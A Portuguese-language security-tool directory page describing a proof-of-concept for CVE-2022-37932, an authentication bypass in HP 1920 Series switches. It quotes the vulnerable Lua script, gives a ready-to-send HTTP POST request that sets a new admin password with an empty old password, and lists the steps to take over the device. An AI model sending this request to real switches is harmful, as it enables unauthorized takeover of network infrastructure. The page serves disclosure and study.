Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-37932 — Exploit de prova de conceito para um bypass de autenticação em switches HP 1920 Series, permitindo alteração não autenticada da senha de administrador via requisição HTTP POST manipulada. | Kitploit
Ferramentas/GitHubGitHub/tim-hoekstra/cve-2022-37932
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubtim-hoekstra/cve-2022-37932

CVE-2022-37932

Exploit de prova de conceito para um bypass de autenticação em switches HP 1920 Series, permitindo alteração não autenticada da senha de administrador via requisição HTTP POST manipulada.

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de Bypass de Autenticação no Firmware do Switch HP

CVE-2022-37932

Versão do Firmware: PD.02.21
Dispositivos Afetados: Switches Gerenciáveis Inteligentes da Série HP 1920

Visão Geral

Este repositório documenta uma vulnerabilidade crítica de bypass de autenticação nos Switches Gerenciáveis Inteligentes da Série HP 1920 executando a versão de firmware PD.02.21. A vulnerabilidade permite que um atacante não autenticado altere a senha do administrador sem autenticação prévia, efetivamente permitindo a tomada completa do dispositivo.

Detalhes Técnicos

A vulnerabilidade existe no script /login/default_password_cfg.lua, que lida com a alteração da senha padrão do dispositivo. Este script:

  1. Aceita requisições POST de formulário sem verificar se o usuário está autenticado
  2. Apenas verifica se o parâmetro oldPwd corresponde à senha padrão (que está em branco/vazia)
  3. Altera diretamente a senha do usuário com base nos parâmetros POST

Código Vulnerável

A seção vulnerável principal em default_password_cfg.lua:

root@kitploit:~
if (request_method == 'POST') then
  -- No authentication or session checks!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- Proceeds to change password
    -- ...
  end
end

O script carece de controles críticos de segurança:

  • Nenhuma validação de sessão
  • Nenhuma proteção CSRF
  • Nenhum limite de taxa
  • Acesso direto à funcionalidade de alteração de senha sem autenticação

Prova de Conceito

Um atacante pode explorar essa vulnerabilidade usando uma simples requisição HTTP POST:

root@kitploit:~
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]

Nota: O parâmetro oldPwd é deixado vazio, pois a senha padrão está em branco.

Impacto

Essa vulnerabilidade permite que um atacante não autenticado:

  1. Altere a senha do administrador sem conhecer nenhuma credencial
  2. Obtenha controle administrativo completo sobre o dispositivo
  3. Configure o switch, modifique as configurações de rede e potencialmente comprometa toda a rede

Caminho de Exploração

  1. Localize um switch vulnerável da Série HP 1920 na rede
  2. Envie a requisição HTTP POST criada diretamente para o dispositivo
  3. A senha do administrador é alterada para um valor controlado pelo atacante
  4. O atacante pode agora fazer login com a nova senha e privilégios totais de administrador

Créditos

Não tive tempo para pesquisar quem descobriu originalmente essa vulnerabilidade, estou apenas postando uma Prova de Conceito.

Aviso Legal

Esta informação é fornecida apenas para fins educacionais. O autor não é responsável por qualquer uso indevido desta informação. Sempre obtenha autorização adequada antes de testar vulnerabilidades.

Baixar ferramenta